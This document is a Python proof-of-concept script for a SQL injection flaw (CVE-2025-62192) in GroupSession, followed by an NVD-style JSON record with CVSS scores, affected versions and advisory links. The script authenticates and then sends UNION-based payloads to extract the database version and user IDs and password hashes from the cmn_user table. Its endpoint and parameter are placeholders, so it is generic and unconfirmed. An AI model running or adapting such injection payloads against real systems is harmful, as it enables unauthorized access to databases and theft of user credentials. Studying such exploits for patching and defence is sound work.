CVE-2025-62192

# CVE-2025-62192 SQL Injection PoC # Target: GroupSession Free < 5.3.0, byCloud < 5.3.3, ZION < 5.3.2 # Type: SQL Injection via authenticated user import requests import sys TARGET_URL = "http://target-groupsession.com/gsession/" LOGIN_URL = TARGET_URL + "login.do" VULN_ENDPOINT = TARGET_URL + "some_endpoint.do" # Replace with actual vulnerable endpoint def login(session, username, password): """Authenticate to GroupSession""" data = { "usr_uid": username, "usr_psw": password } resp = session.post(LOGIN_URL, data=data) return "login" not in resp.url def exploit_sqli(session, payload): """Send SQL injection payload""" headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "param": payload # Vulnerable parameter } resp = session.post(VULN_ENDPOINT, data=data, headers=headers) return resp.text def extract_db_version(session): """Extract database version using UNION-based injection""" payload = "' UNION SELECT NULL,version(),NULL--" return exploit_sqli(session, payload) def extract_users(session): """Extract user credentials""" payload = "' UNION SELECT usr_uid,usr_psw,NULL FROM cmn_user--" return exploit_sqli(session, payload) def main(): if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() if login(session, username, password): print("[+] Login successful") print("[*] Extracting database version...") version = extract_db_version(session) print(f"[+] Database version: {version}") print("[*] Extracting user data...") users = extract_users(session) print(f"[+] User data: {users}") else: print("[-] Login failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62192", "sourceIdentifier": "[email protected]", "published": "2025-12-12T05:16:10.950", "lastModified": "2026-02-17T15:18:18.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection vulnerability exists in GroupSession Free edition prior to ver5.3.0, GroupSession byCloud prior to ver5.3.3, and GroupSession ZION prior to ver5.3.2. If exploited, information stored in the database may be obtained or altered by an authenticated user."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:free:*:*:*", "versionEndExcluding": "5.3.0", "matchCriteriaId": "32599C61-0938-49C5-8416-44C3DF7B144A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:zion:*:*:*", "versionEndExcluding": "5.3.2", "matchCriteriaId": "46F7CACE-2448-4A90-9192-B6270B33E393"}, {"vulnerable": true, "criteria": "cpe:2.3:a:groupsession:groupsession:*:*:*:*:bycloud:*:*:*", "versionEndExcluding": "5.3.3", "matchCriteriaId": "DD4CD8BC-39CB-44FF-A4D8-22C1B38ED223"}]}]}], "references": [{"url": "https://groupsession.jp/info/info-news/security20251208", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://jvn.jp/en/jp/JVN19940619/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}